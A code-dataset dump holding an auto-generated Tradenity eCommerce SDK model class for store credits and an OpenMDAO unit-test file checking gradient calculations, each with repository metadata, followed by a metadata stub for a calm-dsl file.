tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class StoreCredit(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'amount': 'int',
'customer': 'Customer',
'currency': 'Currency',
'transactions': 'list[Transaction]'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'amount': 'amount',
'customer': 'customer',
'currency': 'currency',
'transactions': 'transactions'
}
api_client = None
def __init__(self, id=None, meta=None, amount=None, customer=None, currency=None, transactions=None):
"""StoreCredit - a model defined in Swagger"""
self._id = id
self._meta = None
self._amount = None
self._customer = None
self._currency = None
self._transactions = None
self.discriminator = None
if meta is not None:
self.meta = meta
if amount is not None:
self.amount = amount
self.customer = customer
self.currency = currency
if transactions is not None:
self.transactions = transactions
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this StoreCredit.
:return: The meta of this StoreCredit.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this StoreCredit.
:param meta: The meta of this StoreCredit.
:type: InstanceMeta
"""
self._meta = meta
@property
def amount(self):
"""Gets the amount of this StoreCredit.
:return: The amount of this StoreCredit.
:rtype: int
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this StoreCredit.
:param amount: The amount of this StoreCredit.
:type: int
"""
self._amount = amount
@property
def customer(self):
"""Gets the customer of this StoreCredit.
:return: The customer of this StoreCredit.
:rtype: Customer
"""
return self._customer
@customer.setter
def customer(self, customer):
"""Sets the customer of this StoreCredit.
:param customer: The customer of this StoreCredit.
:type: Customer
"""
self._customer = customer
@property
def currency(self):
"""Gets the currency of this StoreCredit.
:return: The currency of this StoreCredit.
:rtype: Currency
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this StoreCredit.
:param currency: The currency of this StoreCredit.
:type: Currency
"""
self._currency = currency
@property
def transactions(self):
"""Gets the transactions of this StoreCredit.
:return: The transactions of this StoreCredit.
:rtype: list[Transaction]
"""
return self._transactions
@transactions.setter
def transactions(self, transactions):
"""Sets the transactions of this StoreCredit.
:param transactions: The transactions of this StoreCredit.
:type: list[Transaction]
"""
self._transactions = transactions
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(StoreCredit, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, StoreCredit):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_store_credits(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_store_credits(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_store_credits(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_store_credit_by_id(id)
def create(self):
new_instance = self.create_store_credit(self)
self.id = new_instance.id
return self
def update(self):
return self.update_store_credit_by_id(self.id, self)
def delete(self):
return self.delete_store_credit_by_id(self.id)
@classmethod
def create_store_credit(cls, store_credit, **kwargs):
"""Create StoreCredit
Create a new StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_store_credit(store_credit, async=True)
>>> result = thread.get()
:param async bool
:param StoreCredit store_credit: Attributes of storeCredit to create (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_store_credit_with_http_info(store_credit, **kwargs)
else:
(data) = cls._create_store_credit_with_http_info(store_credit, **kwargs)
return data
@classmethod
def _create_store_credit_with_http_info(cls, store_credit, **kwargs):
"""Create StoreCredit
Create a new StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_store_credit_with_http_info(store_credit, async=True)
>>> result = thread.get()
:param async bool
:param StoreCredit store_credit: Attributes of storeCredit to create (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `create_store_credit`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def delete_store_credit_by_id(cls, store_credit_id, **kwargs):
"""Delete StoreCredit
Delete an instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_store_credit_by_id(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
else:
(data) = cls._delete_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
return data
@classmethod
def _delete_store_credit_by_id_with_http_info(cls, store_credit_id, **kwargs):
"""Delete StoreCredit
Delete an instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_store_credit_by_id_with_http_info(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `delete_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def get_store_credit_by_id(cls, store_credit_id, **kwargs):
"""Find StoreCredit
Return single instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_store_credit_by_id(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to return (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
else:
(data) = cls._get_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
return data
@classmethod
def _get_store_credit_by_id_with_http_info(cls, store_credit_id, **kwargs):
"""Find StoreCredit
Return single instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_store_credit_by_id_with_http_info(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to return (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `get_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def list_all_store_credits(cls, **kwargs):
"""List StoreCredits
Return a list of StoreCredits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_store_credits(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[StoreCredit]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._list_all_store_credits_with_http_info(**kwargs)
else:
(data) = cls._list_all_store_credits_with_http_info(**kwargs)
return data
@classmethod
def _list_all_store_credits_with_http_info(cls, **kwargs):
"""List StoreCredits
Return a list of StoreCredits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_store_credits_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[StoreCredit]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
if 'page' in params:
query_params.append(('page', params['page']))
if 'size' in params:
query_params.append(('size', params['size']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='page[StoreCredit]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def replace_store_credit_by_id(cls, store_credit_id, store_credit, **kwargs):
"""Replace StoreCredit
Replace all attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_store_credit_by_id(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to replace (required)
:param StoreCredit store_credit: Attributes of storeCredit to replace (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
else:
(data) = cls._replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
return data
@classmethod
def _replace_store_credit_by_id_with_http_info(cls, store_credit_id, store_credit, **kwargs):
"""Replace StoreCredit
Replace all attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to replace (required)
:param StoreCredit store_credit: Attributes of storeCredit to replace (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id', 'store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `replace_store_credit_by_id`")
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `replace_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def update_store_credit_by_id(cls, store_credit_id, store_credit, **kwargs):
"""Update StoreCredit
Update attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_store_credit_by_id(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to update. (required)
:param StoreCredit store_credit: Attributes of storeCredit to update. (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._update_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
else:
(data) = cls._update_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
return data
@classmethod
def _update_store_credit_by_id_with_http_info(cls, store_credit_id, store_credit, **kwargs):
"""Update StoreCredit
Update attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_store_credit_by_id_with_http_info(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to update. (required)
:param StoreCredit store_credit: Attributes of storeCredit to update. (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id', 'store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `update_store_credit_by_id`")
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `update_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 33.450736
| 122
| 0.614314
| 3,370
| 29,537
| 5.102374
| 0.057864
| 0.093399
| 0.045362
| 0.028787
| 0.843094
| 0.794475
| 0.786333
| 0.778075
| 0.77191
| 0.765688
| 0
| 0.000433
| 0.296374
| 29,537
| 882
| 123
| 33.488662
| 0.826926
| 0.029082
| 0
| 0.640426
| 0
| 0
| 0.144787
| 0.035245
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010638
| null | null | 0.004255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397a6b0709faf72d4f3d17e4cba5367524621398
| 10,656
|
py
|
Python
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 17
|
2018-01-11T20:13:59.000Z
|
2022-03-22T03:46:05.000Z
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 6
|
2017-10-19T23:14:14.000Z
|
2020-11-22T17:30:57.000Z
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 10
|
2018-04-12T22:13:33.000Z
|
2020-05-07T10:02:59.000Z
|
""" Unit tests for the calc_gradient method on Problem. """
from __future__ import print_function
import unittest
import numpy as np
from numpy.testing import assert_almost_equal
from six import text_type, PY3
from openmdao.api import Problem, Group, IndepVarComp, ExecComp
from openmdao.test.simple_comps import RosenSuzuki, FanIn
if PY3:
def py3fix(s):
return s.replace('<type', '<class')
else:
def py3fix(s):
return s
#
# expected jacobian
#
expectedJ = {
'comp.f': {
'parm.x': np.array([
[ -3., -3., -17., 9.]
])
},
'comp.g': {
'parm.x': np.array([
[ 3., 1., 3., 1.],
[ 1., 4., 2., 3.],
[ 6., 1., 2., -1.],
])
}
}
expectedJ_array = np.concatenate((
expectedJ['comp.f']['parm.x'],
expectedJ['comp.g']['parm.x']
))
class TestCalcGradient(unittest.TestCase):
def test_calc_gradient_interface_errors(self):
root = Group()
prob = Problem(root=root)
root.add('comp', ExecComp('y=x*2.0'))
try:
prob.calc_gradient(['comp.x'], ['comp.y'], mode='junk')
except Exception as error:
msg = "mode must be 'auto', 'fwd', 'rev', or 'fd'"
self.assertEqual(text_type(error), msg)
else:
self.fail("Error expected")
try:
prob.calc_gradient(['comp.x'], ['comp.y'], return_format='junk')
except Exception as error:
msg = "return_format must be 'array' or 'dict'"
self.assertEqual(text_type(error), msg)
else:
self.fail("Error expected")
def test_calc_gradient(self):
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x')
prob = Problem(root)
prob.driver.add_desvar('parm.x', lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0.)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_with_poi_indices(self):
p_idxs = [0, 1, 2, 4]
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 2., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x', src_indices=p_idxs)
prob = Problem(root)
prob.driver.add_desvar('parm.x', indices=p_idxs, lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0.)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_with_qoi_indices(self):
q_idxs = [0, 2]
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x')
prob = Problem(root)
prob.driver.add_desvar('parm.x', lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0., indices=q_idxs)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# override expected array value to reflect qoi indices
expectedJ_array = np.concatenate((
expectedJ['comp.f']['parm.x'],
expectedJ['comp.g']['parm.x'][q_idxs, :]
))
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_multiple_params(self):
prob = Problem()
prob.root = FanIn()
prob.setup(check=False)
prob.run()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
if __name__ == "__main__":
unittest.main()
| 42.118577
| 103
| 0.626408
| 1,502
| 10,656
| 4.261651
| 0.08988
| 0.104984
| 0.098266
| 0.101234
| 0.880956
| 0.869395
| 0.860334
| 0.860334
| 0.845805
| 0.839713
| 0
| 0.012813
| 0.21631
| 10,656
| 252
| 104
| 42.285714
| 0.753682
| 0.16967
| 0
| 0.713415
| 0
| 0
| 0.125596
| 0
| 0
| 0
| 0
| 0
| 0.237805
| 1
| 0.042683
| false
| 0
| 0.042683
| 0.012195
| 0.103659
| 0.006098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397d8aa637be1b8c1d921c41918b0b081405da59
| 252
|
py
|
Python
|
calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | null | null | null |
calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | null | null | null |
